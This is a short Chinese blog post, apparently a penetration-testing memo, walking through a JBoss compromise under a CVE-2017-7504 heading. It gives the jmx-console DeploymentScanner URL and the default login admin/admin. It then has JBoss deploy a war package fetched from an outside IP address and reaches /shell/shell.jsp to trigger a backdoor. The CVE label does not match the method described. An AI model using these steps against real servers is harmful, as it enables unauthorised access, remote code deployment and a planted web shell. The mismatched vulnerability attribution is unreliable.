Jboss CVE-2017-7504

访问ip/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL

登陆

弱口令：admin/admin

生成war包部署自己服务器上：http://47.243.68.160/war.war

找到void addURL()，在ParamValue填入我们远程的war包，点击invoke

提示成功后，访问/shell/shell.jsp触发后门

访问/shell/shell.jsp 200界面证明上传成功

posted @ 2021-11-10 16:57 天才小2b 阅读(87) 评论(0) 编辑收藏举报

刷新页面返回顶部

静水流深，沧笙踏歌；三生阴晴圆缺，一朝悲欢离合